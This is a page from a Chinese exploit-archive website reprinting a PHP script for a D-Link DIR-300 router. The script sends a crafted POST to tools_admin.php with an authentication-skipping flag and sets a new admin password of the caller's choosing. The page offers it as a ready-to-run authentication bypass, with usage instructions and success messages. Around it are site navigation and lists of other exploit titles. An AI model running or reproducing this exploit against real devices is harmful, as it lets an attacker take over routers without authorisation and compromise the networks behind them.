首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DIR-300 authentication bypass exploit
来源:karol[at]celin.pl 作者:Celinski 发布时间:2010-11-11  
<?php
if(sizeof($argv)!=4) {
   echo "Usage: php5 $argv[0] <router ip addres> <port>
   <admin password>\n";
   exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
   echo "- Error: could not connect (
   http://$argv[1]:$argv[2]/tools_admin.php).\n";
   exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"login.php")===true) {
   echo "- something goes wrong (check answer - answer.html) !\n";
   $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
   exit;
}
else
   echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FCKeditor 2.x <= 2.4.3 Arbitra
·Mp3-Nator 2.0 Buffer Overflow
·Free CD to MP3 Converter v3.1
·E-Xoopport v3.1 eCal display.p
·Qtweb Browser v3.5 Buffer Over
·Visual MP3 Splitter & Joiner 6
·Linux Kernel Stack Infoleaks V
·VbsEdit v 4.7.2.0 (.vbs) Buffe
·Free CD to MP3 Converter 3.1 B
·Power Audio Editor v7.4.3.230
·FileCOPA FTP Server 6.01 direc
·Mozilla Firefox <= 3.6.12 Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved